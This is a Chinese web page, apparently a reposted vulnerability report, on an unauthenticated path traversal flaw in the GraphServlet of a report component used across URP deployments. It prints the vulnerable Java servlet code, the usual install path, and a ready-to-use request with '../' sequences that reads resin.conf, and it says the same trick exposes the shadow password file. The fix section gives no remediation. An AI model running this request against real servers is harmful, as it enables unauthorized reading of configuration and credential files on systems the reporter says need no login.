网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

URP通杀第二弹(短小精悍的小题目) - 网站安全

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 跟第一发一样,上次那个有大牛提前发了,我来个新鲜的吧,一样的影响,数据量同上,1 38 1 5通杀。先来代码。补充下路径这个应用一般路径是 usr local resin-3 0 27 webapps xfzzhjw public voi...

跟第一发一样,上次那个有大牛提前发了,我来个新鲜的吧,一样的影响,数据量同上,1.38 1.5通杀。先来代码。补充下路径这个应用一般路径是/usr/local/resin-3.0.27/webapps/xfzzhjw/

 

public void service(HttpServletRequest req, HttpServletResponse res)
{
ServletOutputStream out;
InputStream is;
out = null;
is = null;
String graphId = req.getParameter("graphId");
byte b[] = null;
if (graphId != null)
{
b = GraphPool.get(graphId);
GraphPool.remove(graphId);
} else
{
String picFile = req.getParameter("picFile"); //一样的位置
is = getClass().getResourceAsStream(picFile);
b = ControlUtils.getStreamBytes(is);
}
res.setContentType("image/jpeg");
out = res.getOutputStream();
out.write(b);
out.flush();
Exception e;



一样的问题这个,不用登陆。

根据问题代码,构造一下http://x.x.x.x/servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf


唰华丽丽的全都泄露了。
 

1.png



同样的可以查看shadow
 

2.png

 

修复方案:

同第一个亲,cncert有可能的话求个证书~

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论